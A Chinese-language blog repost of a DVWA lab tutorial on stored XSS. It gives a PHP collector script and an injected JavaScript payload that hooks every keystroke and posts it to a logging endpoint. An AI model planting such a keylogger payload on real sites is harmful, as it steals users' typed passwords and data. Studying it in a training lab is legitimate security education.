漏洞复现篇——利用XSS漏洞实现键盘记录
生活随笔
收集整理的這篇文章主要介紹了
漏洞复现篇——利用XSS漏洞实现键盘记录
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
實驗環(huán)境:
- PHPstudy
- 火狐瀏覽器、IE
- DVWA靶場
實驗準備:
在www目錄下創(chuàng)建一個名為keylog.php的文件,代碼如下:
<?php $file = fopen("key.txt","a"); if(isset($_REQUEST['key'])) {$key = $_REQUEST['key'];fputs($file,$key); } ?>模擬實驗:
1、把級別調成low,選擇Stored儲存型,打開F12將輸入限制改為500
2、將下列代碼輸入執(zhí)行,效果如下
<script>document.onkeydown=function(ev){xhr=new XMLHttpRequest();xhr.open('POST','http://localhost/keylog.php',true);xhr.setRequestHeader('Content-type','application/X-WWW-form-urlencoded');xhr.send('key='+String.fromCharCode(ev.keyCode));}</script>3、然后隨便輸入什么東西,key.txt中就會出現(xiàn)記錄,鍵盤記錄器就做完了
總結
以上是生活随笔為你收集整理的漏洞复现篇——利用XSS漏洞实现键盘记录的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 键盘记录器
- 下一篇: 反弹shell和键盘记录器实现